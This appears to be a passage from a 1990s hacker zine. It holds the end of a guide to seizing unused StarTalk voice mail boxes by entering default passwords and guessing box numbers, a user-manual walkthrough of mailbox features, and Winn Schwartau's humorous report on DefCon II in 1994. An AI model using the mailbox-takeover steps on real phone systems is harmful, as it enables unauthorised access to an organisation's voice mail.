default on this box, it should go ahead and ask you to enter your new
personal mailbox password. There is another box number which is sometimes
at the default which is the System Admin’s box at 102. Although this is a
System Admin box, the only System Admin option it has available is to leave
a broadcast message, which leaves a message to all boxes on the system.
This box will have the regular default greeting which is -


"This mailbox is not initialized and cannot accept messages, please
try again later"


Do the same thing you did before. If it says that, press ’**’ and then when
it asks you to enter your mailbox number and your password, enter ’1020000’
and press the # sign. If everything is fine, it should ask you to enter your
new personal mailbox password. This is called Initializing your mailbox, and
I’ll talk about this later in this file. So, there you go, you’ve got your
box on a StarTalk System. All StarTalk Voice Mail Systems that I have run
into so far have had 2-3 digit mailboxes. Now, to hack any other boxes
through the system, you would have to go and keep on trying 3 digit mailbox
numbers starting with 1XX, until you find an empty box with a regular default
greeting. Let’s say you find another empty box at box number 130, you will do
the same thing, press ’**’ and when it asks you to enter your mailbox number
and your password, enter ’1300000’ and press the # sign. One thing I like
about box number ’101’ is that a lot of System Admins are not aware that it
even exists, that is because they probably have a lousy TSR (Technical Service
Rep). (This is the person that is supposed to help them install the Voice
Mail System.)


What to do After you’ve Got A StarTalk Voice Mail Box

The rest of the file will concentrate on all the inside functions and
options that a StarTalk Voice Mail Box has. We will be covering all
these topics -


o Initializing a Mailbox
o Your Mailbox Greeting
o Recording a Greeting
o Choosing a Mailbox Greeting
o Listening To Messages
o Off-premise Message Notification
o Setting Up Off-premise Message Notification
o Disabling Off-premise Message Notification
o Changing Off-premise Message Notification
o Leaving a Mailbox Message
o Message Delivery Options
o Assigning the Target Attendant
o Quick Reference Tips


Your Mailbox 


Before you can use your mailbox, you must:


- open your mailbox
- change your password
- record your name
- record your personal mailbox greeting(s)


This is called Initializing your mailbox.


Initializing a Mailbox


To open and initialize your mailbox:


1. Press * * and Mailbox #
2. Enter the default password ’0000’
3. To end the password, press #
4. The StarTalk voice prompt asks you to enter your new personal mailbox
   password.
5. Using touchtones, enter your new mailbox password. Your password can
   be from 4 to 8 digits long, but it cannot start with zero.
6. To end your password, press #
7. After you have accepted your password, you are asked to record your name
   in the Company Directory. At the tone, record your name.
8. To end your recording, press #
9. To accept your recording, press #


You are now ready to record your personal mailbox greetings. Once your
greetings are recorded, you have the option of selecting either your primary
or alternate greeting. If you do not select a greeting, your primary
greeting plays automatically.

Note: Initializing a mailbox is only done the first time you open your
mailbox. You have to initialize your mailbox to receive messages.


Your Mailbox Greeting 


Each mailbox has a primary and alternate greeting recorded by you. 
After you have recorded your personal mailbox greetings, you can choose 
which greeting you play to callers reaching your mailbox. 


Recording a Greeting 


To record your greetings, you must first open your mailbox. Once you have 
opened your mailbox: 


1. Press 8
2. To select Greeting Options, press 2
3. To record your greeting, press 1
4. Select which greeting you are going to record.
   Note: You can choose to record either your primary or alternate mailbox
   greeting.
5. To record your greeting, press 1
6. At the tone, record your greeting.
7. To end your greeting, press #
8. To accept this recording, press #


Choosing a Mailbox Greeting 


After the mailbox greeting is recorded, you can choose which greeting you 
are going to use. If you do not choose a mailbox greeting, Startalk 
automatically plays your primary greeting. To choose a mailbox greeting 
you must open your mailbox. Once you have opened your mailbox: 


1. Press 8
2. To select Greeting Options, press 2
3. Press 2
4. Select which mailbox greeting your mailbox is going to use.


Listening To Messages 


Each time you open your mailbox, StarTalk plays any Broadcast messages left 
by the System Admin (don’t reply to them!), and also tells you how many other 
messages are in your mailbox. Messages are played beginning with any Urgent 
messages, followed by the first message left in your mailbox. 


To listen to messages, you must open your mailbox. Once you have opened 
your mailbox: 


1. To listen to messages, press 2 or to listen to your saved messages,
   press 6


Your first message starts to play. While listening to a message, or after
a message has played, you can:


Replay the message
Back up 9 seconds
Pause and Continue   to pause then 2 to continue
Forward 9 seconds
Skip to the end of message
Play the previous message
Forward the message
Skip to the next message
Play time and date stamp
Save a Message
Erase the message
Reply to the message
Volume control


Note: After listening to the messages left in your mailbox and exiting
StarTalk, all messages you do not erase are automatically saved.

Off-premise Message Notification


Off-premise Message Notification, to a telephone number or a pager, alerts
you when messages are left in your mailbox. Off-premise Message Notification
is enabled in the StarTalk Class of Service designation by the System
Coordinator.


Setting Up Off-premise Message Notification


To set up Off-premise Message Notification, you must first open your
mailbox. Once you have opened your mailbox:


1. Open the mailbox admin menu, press 8
2. Open the message notification menu, press 6
3. To set up message notification, press 1
4. To select line, press 1
   Note: You can also select line, pool or intercom.
   (YOU HAVE TO SELECT LINE)
5. Enter a line, pool or IC number, press #
   Note: You have to enter ’1’, or ’01’ as the line if 1 doesn’t work.
6. To accept the line, pool or IC number, press #
7. Enter the destination telephone number, press #
   Note: While you are entering a telephone number, you can press a dialpad
   number to represent dialtone recognition or other telephone number options.

   When StarTalk is installed with PBX or Centrex and you want to access an
   outside line, you must enter the command to recognize dial tone. For
   example enter 9 to access an outside line, press # then enter 4 to
   recognize dialtone press 2 followed by the destination number,
   and any required pauses. Press #.
   Each pause entered is four seconds long.
8. To end the telephone number, press #
9. To accept the telephone number, press #
10. To accept the destination type telephone, press # and move to step 12.
11. To change the destination type to pager, press 1
    Note: The destination type can be either telephone or pager. StarTalk
    automatically selects telephone. When the pager destination
    type is selected, a pause must be inserted. The number of pauses
    required depends on the pager system being used.
12. To accept the destination type, press #
    Note: If the message destination type is a telephone, you must set a
    start time.
13. Enter the time when Off-premise Message Notification is to start.
    Note: This is a four-digit field. Any single digit hour and minute
    must be preceded by a zero.
14. Press 1 for AM, 2 for PM.
15. To accept the start time, press #
16. Enter the time when Off-premise Message Notification is to stop.
    Note: This is a four-digit field. Any single digit hour and
    minute must be preceded by a zero.
17. Press 1 for AM, 2 for PM.
18. To accept the stop time, press #
19. To accept the message type NEW, press #
20. To change the message type to URGENT, press 1
    Note: The default message type is NEW. This means you are notified
    whenever you receive a new message. Changing the message type changes
    NEW to URGENT. This means you are only notified when you receive an
    urgent message.
21. To accept the message type, press #


Off-premise Message Notification will begin as soon as the start time is
reached. You will be called whenever you receive a message.


Disabling Off-premise Message Notification


To disable Off-premise Message Notification, you must first open your
mailbox. Once your mailbox is open:


1. Open the mailbox admin menu, press 8
2. To access the message notification menu, press 6
3. To listen to the options, press 2
4. To disable message notification, press 1


Off-premise Message Notification is disabled.


Changing Off-premise Message Notification 


To change Off-premise Message Notification, you must first open your mailbox.
Once you have opened your mailbox:


1. Open the mailbox admin menu, press 8
2. Open the message notification menu, press 6
3. To change message notification press 1
4. To select a line, press 1
5. Press 1
   If you wish to change the line, press #
6. Enter the new line number.
7. To end the line number, press #
8. To accept the line number, press #
9. Press 1
   If you do not wish to change the destination telephone number, press #
10. Enter the new destination telephone number.
11. To end the telephone number, press #
12. To accept the telephone number, press
13. To change the destination type, press
14. To accept the destination type, press
15. To change the start time, press 1
    If you do not wish to change the time, press #
16. Enter the time when Off-premise Message Notification is to start.
17. Press 1 for AM, 2 for PM.
18. To accept the start time, press #
19. To change the stop time, press 1
    If you do not wish to change the time, press #
20. Enter the time when Off-premise Message Notification is to stop.
21. Press 1 for AM, 2 for PM.
22. To accept the stop time, press #
23. To change the message type, press 1
24. To accept the message type, press #


Leaving a Mailbox Message


You can leave a message directly in any StarTalk mailbox, as long as that
mailbox has been initialized.


To leave a mailbox message:


1. Enter the mailbox # and at the tone, record your message.
2. To end your recording, press #
3. For delivery options, press 3
4. To send your message, press #


Message Delivery Options


StarTalk provides you with four message delivery options, which are:


Certified 1 - This delivery option sends you a message and tells you if
              the person received and read your message, but this is
              only if the message is inside the system.


Urgent 2 - This delivery option marks the message, and plays it before
           playing other messages left in your mailbox


Private 3 - This delivery option prevents a message from being forwarded
            to another mailbox.


Normal # - This delivery option sends a message to a mailbox. Normal
           messages are played in the order in which they are received,
           and can be forwarded to other mailboxes.


After you have recorded your mailbox message, press 3 to access delivery 
options. To use one of the delivery options, press the right delivery 
option number. 


Note: When leaving a message, you can press 9 to listen to StarTalk voice 
prompts in the alternate language. 


Assigning the Target Attendant 


Anyone that presses [0] when they are connected to your box will be 
transferred to an operator if your Target Attendant is set to [0] or her 
mailbox #. 


To change from the Operator to the Target Attendant - 


1. Press 8 
2. Press 5 
3. Press 1 
4. Enter <desired extension> 
5. Press * 


Quick Reference Tips 


- To save time, you can just interrupt most prompts by pressing # or selecting
a StarTalk option.


- If you get lost using StarTalk options, press * to replay the option list 




Ok, this is the end of the StarTalk voice mail guide. I tried my best
to make it as simple as I could with respect to both hacking it
and using it. I plan on writing my next file on Smooth Operator, a
PC-based information processing system. I will probably focus more on 
the terminal part of it. I will try and cover the logins and all other 
things needed to get around the system. If any readers out there have 
comments or suggestions on this article, or on my next article, please 
contact me. 


If you would like to talk about this, you can find me on IRC with the nick
’redskull’ or you can write me a message on my Internet Address.
Internet Address : redskull@io.org


I’d like to thank S. Cleft for giving me some tips and also discovering 
some of the things I’ve mentioned in this file. 


DefCon II: Las Vegas
Cyber-Christ meets Lady Luck 
July 22-24, 1994 
by Winn Schwartau 


(C) 1994 


Las Vegas connotes radically different images to radically
different folks. The Rat Pack of Sinatra, Dean Martin and Sammy
Davis Jr. elicits up the glistening self-indulgent imagery of
Vegas’ neon organized crime in the ’50’s (Ocean’s Eleven
displayed only minor hacking skills.)


Then there’s the daily bus loads of elderly nickel slot gamblers
from Los Angeles and Palm Springs who have nothing better
to do for twenty out of twenty four hours each day. (Their
dead husbands were golf hacks.) Midwesterners now throng to
the Mississippi River for cheap gambling.


Recreational vehicles of semi-trailer length from East Bullock,
Montana and Euclid, Oklahoma and Benign, Ohio clog routes 80
and 40 and 10 to descend with a vengeance upon an asphalt home
away from home in the parking lot of Circus Circus. By cultural
demand, every RV’er worth his salt must, at least once in
his life, indulge in the depravity of Glitter Gulch.


And so they come, compelled by the invisibly insidious derelict 
attraction of a desert Mecca whose only purpose in life is to 
suck the available cash from addicted visitor’s electronic 
purses of ATM and VISA cards. (Hacker? Nah... .) 


Vegas also has the distinction of being home to the largest of
the largest conventions and exhibitions in the world. Comdex
is the world’s largest computer convention where 150,000
techno-dweebs and silk suited glib techno-marketers display their
wares to a public who is still paying off the 20% per annum
debt on last year’s greatest new electronic gismo which is
now rendered thoroughly obsolete. And the Vegas Consumer
Electronic Show does for consumer electronics what the First
Amendment does for pornography. (Hackers, are we getting close?)


In between, hundreds upon hundreds of small conferences and
conventions and sales meetings and annual excuses for excess
all select Las Vegas as the ultimate host city. Whatever you
want, no matter how decadent, blasphemous, illegal or immoral, at
any hour, is yours for the asking, if you have cash or a clean
piece of plastic.


So, it comes as no surprise, that sooner or later, (and it turns 
out to be sooner) that the hackers of the world, the computer 
hackers, phone phreaks, cyber-spooks, Information Warriors, data 
bankers, Cyber-punks, Cypher-punks, eavesdroppers, chippers, 
virus writers and perhaps the occasional Cyber Christ again 
picked Las Vegas as the 1994 site for DefCon II. 


You see, hackers are like everyone else (sort of) and so they,
too, decided that their community was also entitled to hold
conferences and conventions.


DefCon (as opposed to Xmas’s HoHoCon), is the premier mid-year
hacker extravaganza. Indulgence gone wild, Vegas notwithstanding
if previous Cons are any example; but now put a few hundred
techno-anarchists together in sin city USA, stir in liberal
doses of illicit controlled pharmaceutical substances, and we
have a party that Hunter Thompson would be proud to attend.


All the while, as this anarchistic renegade regiment marches to
the tune of a 24 hour city, they are under complete surveillance
of the authorities. Authorities like the FBI, the Secret Service,
telephone security . . . maybe even Interpol. And how did
the "man" arrive in tow behind the techno-slovens that belong
behind bars?


They were invited.


And so was I. Invited to speak. (Loose translation for standing
up in front of hundreds of hackers and being verbally skewered
for having an opinion not in 100% accordance with their own.)


"C’mon, it’ll be fun," I was assured by DefCon’s organizer, the
Dark Tangent.


"Sure fired way to become mutilated monkey meat," I responded.
Some hackers just can’t take a joke, especially after a prison
sentence and no opposite-sex sex.


"No really, they want to talk to you..."
"I bet."


It’s not that I dislike hackers - on the contrary. I have even
let a few into my home to play with my kids. It’s just that, so
many of the antics that hackers have precipitated at other Cons
have earned them a reputation of disdain by all, save those who
remember their own non-technical adolescent shenanigans. And I
guess I’m no different. I’ve heard the tales of depraved
indifference, hotel hold-ups, government raids on folks with names
similar to those who are wanted for pushing the wrong key on the
keyboard and getting caught for it. I wanted to see teens and
X-generation types with their eyes so star sapphire glazed over that
I could trade them for chips at the craps table.


Does the truth live up to the fiction? God, I hope so. It’d be 
downright awful and unAmerican if 500 crazed hackers didn’t get 
into at least some serious trouble. 


So I go to Vegas because, because, well, it’s gonna be fun. And, 
if I’m lucky, I might even see an alien spaceship. 


For you see, the party has already begun. 


I go to about 30 conventions and conferences a year, but rarely
if ever am I so Tylenol and Afrin dosed that I decide to go with
a severe head cold. Symptomatic relief notwithstanding I debated
and debated, and since my entire family was down with the same
ailment I figured Vegas was as good a place to be as at home in
bed. If I could survive the four and half hour plane flight
without my Eustachian tubes rocketing through my ear drums and
causing irreparable damage, I had it made.


The flight was made tolerable because I scuba dive. Every few
minutes I drowned out the drone of the engines by honking
uncontrollably like Felix Unger without his aspirator. To the
chagrin of my outspoken counter surveillance expert and traveling
mate, Mike Peros and the rest of the first class cabin, the
captain reluctantly allowed me to remain on the flight and not be
expelled sans parachute somewhere over Southfork, Texas. Snort,
snort. Due to extensive flirting with the two ladies across the
aisle, we made the two thousand mile trek in something less than
34 minutes... or so it seemed. Time flies took on new meaning.


For those who don’t know, the Sahara Hotel is the dregs of the
Strip: We were not destined for Caesar’s or the MGM or any of
the new multi-gazillion dollar hotel cum casinos which produce
pedestrian stopping extravaganzas as an inducement to suck in
little old ladies to pour endless rolls of Washington quarters in
mechanical bottomless pits. The Sahara was built some 200 years
ago by native slave labor whose idea of plumbing is clean sand
and decorators more concerned with a mention in Mud Hut Daily
than Architectural Digest. It was just as depressingly dingy and
solicitly low class as it was when I was forced to spend eleven days
there (also with a killer case of the flu) for an extended Comdex
computer show. But, hey, for a hacker show, it was top flight.


"What hackers?" The desk clerk said when I asked about the show.


I explained. Computer hackers: the best from all over the
country. "I hear even Cyber Christ himself might appear."


Her quizzical look emphasized her pause. Better to ignore a
question not understood than to look stupid. "Oh, they’ll be
fine. We have excellent security." The security people, I found
out shortly thereafter knew even less: "What’s a hacker?" Too
much desert sun takes its toll. Proof positive photons are bad
for neurons.


Since it was still only 9PM Mike and I sucked down a couple of $1
Heinekens in the casino and fought it out with Lineman’s
Switching Union representatives who were also having their convention
at the Sahara. Good taste in hotels goes a long way.


"$70,000 a year to turn a light from red to green?" we
complained.
"It’s a tension filled job . . .and the overtime is murder."


"Why a union?" 

"To protect our rights." 

"What rights?" 

"To make sure we don’t get replaced by a computer 


"Yeah," I agreed. "That would be sad. No more Amtrak 
disasters." The crowd got ugly so we made a hasty retreat under 
the scrutiny of casino security to our rooms. Saved. 


Perhaps if I noticed or had read the original propaganda on 
DefCon, I might have known that nothing significant was going to 
take place until the following (Friday) evening I might have 
missed all the fun. 


For at around 8AM, my congestion filled cavities and throbbing
head was awakened by the sound of an exploding toilet. It’s kind
of hard to explain what this sounds like. Imagine a toilet
flushing through a three megawatt sound system at a Rolling
Stones concert. Add to that the sound of a hundred thousand flu
victims standing in an echo chamber cleansing their sinuses into a
mountain of Kleenex while three dozen football referees blow
their foul whistles in unison, and you still won’t come close to
the sheer cacophonous volume that my Saharan toilet exuded from
within its bowels. And all for my benefit.


The hotel manager thought I was kidding. "What do you mean
exploded?"


"Which word do you not understand?" I growled in my early morning 
sub-sonic voice. "If you don’t care, I don’t." 


My bed was floating. Three or maybe 12 inches of water created
the damnedest little tidal wave I’d ever seen, and the sight and
sound of Lake Meade in room 1487 only exacerbated the pressing
need to relieve myself. I dried my feet on the extra bed linens,
worried about electrocution and fell back asleep. It could have
been 3 minutes or three hours later - I have no way to know -
but my hypnagogic state was rudely interrupted by hotel
maintenance pounding at the door with three fully operational
muffler-less jack hammers.


"I can’t open it," I bellowed over the continual roar of my
personal Vesuvius Waterfall. "Just c’mon in." The fourteenth
floor hallway had to resemble an underwater coral display because
the door opened ever so slowly..


"Holy Christ!"


Choking back what would have been a painful laugh, I somehow
eked out the words, with a smirk, "Now you know what an
exploding toilet is like."


For, I swear, the next two hours three men whose English was 
worse than a dead Armadillo attempted to suck up the Nile River 
from my room and the hallway. Until that very moment in time, I 
didn’t know that hotels were outfitted with vacuum cleaners 
specifically designed to vacuum water. Perhaps this is a regular 
event. 


Everyone who has ever suffered through one bitches about Vegas
buffets, and even the hackers steered away from the Sahara’s
$1.95 "all you can eat" room: "The Sahara’s buffet is the worst
in town; worse than Circus Circus." But since I had left my
taste buds at 37,000 feet along with shrapneled pieces of my
inner ear, I sought out sustenance only to keep me alive another
24 hours.


By mid afternoon, I had convinced myself that outside was not the 
place to be. After only eighteen minutes of 120 sidewalk egg- 
cooking degrees, the hot desert winds took what was left of my 
breath away and with no functioning airways as it was, I knew 
this was a big mistake. So, hacker convention, ready or not, 
here I come. 


Now, you have to keep in mind that Las Vegas floor plans are 
designed with a singular purpose in mind. No matter where you 
need to go, from Point A to Point B or Point C or D or anywhere, 
the traffic control regulations mandated by the local police and 
banks require that you walk by a minimum of 4,350 slot machines, 
187 gaming tables of various persuasions and no less than 17 
bars. Have they no remorse? Madison Avenue ad execs take heed! 


So, lest I spend the next 40 years of my life in circular pursuit
of a sign-less hacker convention losing every last farthing I
inherited from dead Englishmen, I asked for the well hidden
location at the hotel lobby.


"What hackers?" There goes that nasty photon triggered neuron
depletion again.


"The computer hackers."


"What computer hackers. We don’t have no stinking hackers
Desk clerk humor, my oxymoron for the week.


I tried the name: DefCon II.


"Are we going to war?" one ex-military Uzi-wielding guard said
recognizing the etymology of the term.


"Yesh, it’s true" I used my most convincing tone. "The
Khasakstanis are coming with nuclear tipped lances riding hundred foot
tall horses. Paris has already fallen. Berlin is in ruins.
Aren’t you on the list to defend this great land?"


"Sure as shit am!" He scampered off to the nearest phone in an
effort to be the first on the front lines. Neuron deficiency
beyond surgical repair..


I slithered down umpteen hallways and casino aisles lost in the
jungle of jingling change. Where the hell are the hackers?
"They must be there," another neuron-impoverished Saharan
employee said as he pointed towards a set of escalators at the very far
end of the casino.


All the way at the end of the almost 1/4 mile trek through Sodom
and Gonorrhea an ’up’ escalator promised to take me to hackerdom.
Saved at last. Upstairs. A conference looking area. No signs
anywhere, save one of those little black Velcro-like stick-em
signs where you can press on white block letters.


No Mo Feds 


I must be getting close. Aha, a maintenance person; I’ll ask him.
"What hackers? What’s DefCon." 


Back downstairs, through the casino, to the front desk, back
through the casino, up the same escalator again. Room One I was
told. Room One was empty. Figures. But, at the end of a
hallway, past the men’s room and the phones, and around behind
Room One I saw what I was looking for: a couple of dozen
T-shirted, Seattle grunged out kids (read: under 30) sitting at
uncovered six foot folding tables hawking their DefCon II clothing,
sucking on Heinekens and amusing themselves with widely strewn
backpacks and computers and cell phones.


I had arrived! 


* * * * *


You know, regular old suit and tie conferences could learn a
thing or two from Jeff Moss, the man behind DefCon II. No fancy
badge making equipment; no $75 per hour union labor built
registration desks; no big signs proclaiming the wealth of knowledge
to be gained by signing up early. Just a couple of kids with a
sheet of paper and a laptop.


It turned out I was expected. They handed me my badge and what a
badge it was. I’m color blind, but this badge put any
psychedelically induced spectral display to shame. In fact it was a close
match to the Sahara’s mid 60’s tasteless casino carpeting which
is so chosen as to hide the most disgusting regurgative blessing.
But better and classier.


The neat thing was, you could (in fact had to) fill out your own
badge once your name was crossed off the piece of paper that
represented the attendee list.


Name:
Subject of Interest:
E-Mail:


Fill it out any way you want. Real name, fake name, alias,
handle - it really doesn’t matter cause the hacker underground
ethic encourages anonymity. "We’d rather not know who you are
anyway, unless you’re a Fed. Are you a Fed?"


A couple of lucky hackers wore the ultimate badge of honor. An
"I Spotted A Fed" T-shirt. This elite group sat or lay on the
ground watching and scouring the registration area for signs that
someone, anyone, was a Fed. They really didn’t care or not if
you were a Fed they wanted the free T-shirt and the peer
respect that it brought.


I’m over 30 (OK, over 35) and more than a few times (OK, a little 
over 40) I had to vehemently deny being a Fed. Finally Jeff Moss 
came to the rescue. 


"He’s not a Fed. He’s a security guy and a writer." 


"Ugh! That’s worse. Can I get a T-shirt cause he’s a writer?" 
No way hacker-breath. 


Jeff. Jeff Moss. Not what I expected. I went to school with a
thousand Jeff Mosses. While I had hair down to my waist, wearing
paisley leather fringe jackets and striped bell bottoms so wide I
appeared to be standing on two inverted ice cream cones, the Jeff
Mosses of the world kept their parents proud. Short, short
cropped hair, accented by an ashen pall and clothes I still
wouldn’t wear today. They could get away with anything cause
they didn’t look the part of radical chic. Jeff, I really like
Jeff: he doesn’t look like what he represents. Bruce Edelstein,
(now of HP fame) used to work for me. He was hipper than hip but
looked squarer than square. Now today that doesn’t mean as much
as it used to, but we ex-30-somethings have a hard time
forgetting what rebellion was about. (I was suspended 17 times in the
first semester of 10th grade for wearing jeans.)


Jeff would fit into a Corporate Board Meeting if he wore the 
right suit and uttered the right eloquencies: Yes, that’s it: A 
young Tom Hanks. Right. I used to hate Tom Hanks (Splash, how 
fucking stupid except for the TV-picture tube splitting squeals) 
but I’ve come to respect the hell out of him as an actor. Jeff 
never had to pass through that first phase. I instantly liked 
him and certainly respect his ability to pull off a full fledged 
conference for only $5000. 


You read right. Five grand and off to Vegas with 300 of your
closest personal friends, Feds in tow, for a weekend of
electronic debauchery. "A few hundred for the brochure, a few hundred
here, a ton in phone bills, yeah, about $5000 if no one does any
damage." Big time security shows cost $200,000 and up. I can
honestly say without meaning anything pejorative at any of my
friends and business acquaintances, that I do not learn 40 times
as much at the ’real’ shows. Something is definitely out of
whack here. Suits want to see suits. Suits want to see fancy.
Suits want to see form, substance be damned. Suits should take a
lesson from my friend Jeff.


* * * * *


I again suffered through a tasteless Saharan buffet dinner which
cost me a whopping $7.95. I hate grits - buttered sand is what I
call them - but in this case might well have been preferable.
Somehow I coerced a few hackers to join me in the ritualistic
slaughter of our taste buds and torture of our intestines. They
were not pleased with my choice of dining, but then who gives a
shit? I couldn’t taste anything anyway. Tough.


To keep our minds off of the food we talked about something much 
more pleasant: the recent round of attacks on Pentagon computers 
and networks. "Are the same people involved as in the sniffing 
attacks earlier this year?" I asked my triad of dinner mates. 


"Indubitably." 


"And what’s the reaction from the underground - other hackers?" 


Coughs, sniffs. Derisive visual feedback. Sneers. The finger. 
"We can’t stand ’em. They’re making it bad for everybody." Two 
fingers. 


By and large the DefCon II hackers are what I call ’good hackers’
who hack, and maybe crack some systems upon occasion, but aren’t
what I refer to as Information Warriors in the bad sense of the
word. This group claimed to extol the same position as most of
the underground would: the Pentagon sniffing crackers - or
whoever who is assaulting thousands of computers on the net -
must be stopped.


"Scum bags, that what they are." I asked that they not sugarcoat
their feelings on my behalf. I can take it. "These fuckers are
beyond belief; they’re mean and don’t give a shit how much damage
they do." We played with our food only to indulge in the single
most palatable edible on display: ice cream with gobs of
chocolate syrup with a side of coffee.


The big question was, what to do? The authorities are certainly
looking for a legal response; perhaps another Mitnick or Phiber
Optik. Much of the underground cheered when Mark Abene and
others from the renowned Masters of Destruction went to spend a
vacation at the expense of the Feds. The MoD was up to no good
and despite Abene’s cries that there was no such thing as the
MoD, he lost and was put away. However many hackers believe as I
do, that sending Phiber to jail for hacking was the wrong
punishment. Jail time won’t solve anything nor cure a hacker from his
first love. One might as well try to cure a hungry man from
eating. No, Mark did wrong, but sending him to jail was wrong,
too. The Feds and local computer cops and the courts have to
come up with punishments appropriate to the crime. Cyber-crimes
(or cyber-errors) should not be rewarded by a trip to an all male
hotel where the favorite toy is a phallically carved bar of soap.


On the other hand, hackers in general are so incensed over the
recent swell of headline grabbing break-ins, and law enforcement
has thus far appeared to be impotent, ("These guys are good.")
that many are searching for alternative means of retribution.


"An IRA style knee capping is in order," said one.


"That’s not good enough, not enough pain," chimed in another.
(Sip, sip. I can almost taste the coffee.)


"Are you guys serious?" I asked. Violence? You? I thought I
knew them better than that. I know a lot of hackers, none that I
know of is violent, and this extreme Pensacola retribution
attitude seemed totally out of character. "You really wouldn’t
do that, would you?" My dinner companions were so upset and they
claimed to echo the sentiment of all good-hackers in good
standing, that yes, this was a viable consideration.


"The Feds aren’t doing it, so what choice do we have? I’ve heard
talk about taking up a collection to pay for a hit man . . ."
Laughter around, but nervous laughter.


"You wouldn’t. . ." I insisted.


"Well, probably not us, but that doesn’t mean someone else
won’t do it."


"So you know who’s behind this whole thing." 


"Fucking-A we do," said yet another hacker chomping at the bit. 
He was obviously envisioning himself with a baseball bat in his 
hand. 


"So do the Feds." 


So now I find myself in the dilemma of publishing the open secret
of who’s behind the Internet sniffing and Pentagon break ins, but
after talking to people from both the underground and law
enforcement, I think I’ll hold off awhile. It serves no immediate
purpose other than to warn off the offenders, and none of us want
that.


Obviously all is not well in hacker-dom. 


* * * * *


The registration area was beyond full; computers, backpacks 
everywhere, hundreds of what I have to refer to as kids and a 
fair number of above ground security people. Padgett Peterson of 
Martin Marietta was going to talk about viruses, Sara Gordon on 
privacy, Mark Aldrich is a security guy from DC., and a bunch of 
other folks I see on the seemingly endless security trade show 
circuit. Jeff Moss had marketed himself and the show excellently. 
Los Angeles sent a TV crew, John Markoff from the New York Times 
popped in as did a writer from Business Week. (And of course, 
yours truly.) 


Of the 360 registrees ("Plus whoever snuck in," added Jeff) I
guess about 20% were so-called legitimate security people. That’s
not to belittle the mid-20’s folks who came not because they were
hackers, but because they like computers. Period. They hack for
themselves and not on other systems, but DefCon II offered
something for everyone.


I remember 25 years ago how my parents hated the way I dressed 
for school or concerts or just to hang out: God forbid! We wore 
those damned jeans and T-shirts and sneakers or boots! "Why can’t 
you dress like a human being," my mother admonished me day after 
day, year after year. So I had to check myself because I can’t 
relate to Seattle grunge-ware. I’m just too damned old to wear 
shirts that fit like kilts or sequin crusted S&M leather straps. 
Other than the visual cacophony of dress, every single 
hacker/phreak that I met exceeded my expectations in the area of 
deportment. 


These are not wild kids on a rampage. The stories of
drug-induced frenzies and peeing in the hallways and tossing entire
rooms of furniture out of the window that emanated from the
HoHoCons seemed a million miles away. This was admittedly an
opportunity to party, but not to excess. There was work to be
done, lessons to be learned and new friends to make. So getting
snot nosed drunk or ripped to the tits or Ecstatically high was
just not part of the equation. Not here.


Now Vegas offers something quite distinct from other cities
which host security or other conventions. At a Hyatt or a Hilton
or any other fancy-ass over priced hotel, beers run $4 or $5 a
crack plus you’re expected to tip the black tied minimum wage
worker for popping the top. The Sahara (for all of the other
indignities we had to suffer) somewhat redeemed itself by
offering an infinite supply of $1 Heinekens. Despite hundreds of beer
bottles spread around the huge conference area (the hotel was
definitely stingy in the garbage pail business) public
drunkenness was totally absent. Party yes. Out of control? No way.
Kudos!


Surprisingly, a fair number of women (girls) attended. A handful 
were there ’for the ride’ but others . . . whoa! they know their 
shit. 


I hope that’s not sexist; merely an observation. I run across so
few technically fluent ladies it’s just a gut reaction. I wish
there were more. In a former life, I owned a TV/Record
production company called Nashville North. We specialized in country
rock taking advantage of the Urban Cowboy fad in the late 1970’s.
Our crew of producers and engineers consisted of the "Nashville
Angels." And boy what a ruckus they would cause when we recorded
Charlie Daniels or Hank Williams: they were stunning. Susan
produced and was a double for Jacqueline Smith; we called Sally
"Sabrina" because of her boyish appearance and resemblance to
Kate Jackson. A super engineer. And there was Rubia Bomba, the
Blond Bombshell, Sherra, who I eventually married: she knew
country music inside and out - after all she came from Nashville
in the first place.


When we would be scheduled to record an act for live radio, some
huge famous country act like Asleep at The Wheel or Merle Haggard
or Johnny Paycheck or Vassar Clements, she would wince in
disbelief when we cried, "who’s that?" Needless to say, she knew the
songs, the cues and the words. They all sounded alike. Country
Music? Ecch. (So I learned.)


At any rate, ladies, we’re equal opportunity offenders. C’mon
down and let’s get technical.


As the throngs pressed to register, I saw an old friend, Erik
Bloodaxe. I’ve known him for several years now and he’s even
come over to baby sit the kids when he’s in town. (Good
practice.) Erik is about as famous as they come in the world of
hackers. Above ground the authorities investigated him for his
alleged participation in cyber crimes: after all, he was one of
the founders of the Legion of Doom, and so, by default, he must
have done something wrong. Never prosecuted, Erik Bloodaxe lives
in infamy amongst his peers. To belay any naysayers, Erik
appeared on every single T-shirt there.


"I Only Hack For Money," 
Erik Bloodaxe 


proclaimed dozens of shirts wandering through the surveillance 
laden casinos. His is a name that will live in infamy. 


So I yelled out, "Hey Chris!" He gave his net-name to the
desk/table registrar. "Erik Bloodaxe."


"Erik Bloodaxe?" piped up an excited high pitched male voice.
"Where?" People pointed at Chris who was about to be
embarrassingly amused by sweet little tubby Novocain who practically bowed
at Chris’s feet in reverence. "You’re Erik Bloodaxe?" Novocain
said with nervous awe - eyes gleaming up at Chris’s ruddy skin
and blond pony-tail.


"Yeah," Chris said in the most off handed way possible. For
people who don’t know him this might be interpreted as arrogance
(and yes there is that) but he also has trouble publicly
accepting the fame and respect that his endearing next-generation
teenage fans pour on him.


"Wow!" Novocain said with elegance and panache. "You’re Erik
Bloodaxe." We’d just been through that said Chris’s eyes.
"Yeah."

"Wow, well, um, . . . I mean, wow,
you’re the best." What does Sylvia Jane Miller from Rumpsteer,
Iowa say to a movie star? This about covered it. The Midwest
meets Madonna. "Wow!" Only here it’s Novocain meets Cyber
Christ himself.


Like any other security show or conference or convention there is
a kickoff, generally with a speech. And DefCon II was no
exception. Except.


Most conventional conventions (ConCons) start at 7:30 or 8:00 AM
because, well, I don’t know exactly why, except that’s when
so-called suits are expected to show up in their cubicles.
DefCon, on the other hand, was scheduled to start at 10PM on Friday
night when most hackers show up for work. Most everyone had
arrived and we were anxiously awaiting the opening ceremonies.
But, here is where Jeff’s lack of experience came in. The
kick-off speaker was supposed to be Mark Ludwig of virus writing fame
and controversy. But, he wasn’t there!


He had jet lag. 


"From Phoenix?" I exclaimed in mock horror to which nearby hack\037 
ers saw the absurdity of a 45 minute flight jet lag. Mark has a 
small frame and looks, well, downright weak, so I figured maybe 
flying and his constitution just didn’t get along and he was 
massaging his swollen adenoids in his room. 


"Oh, no! He’s just come in from Australia. . a Well that 
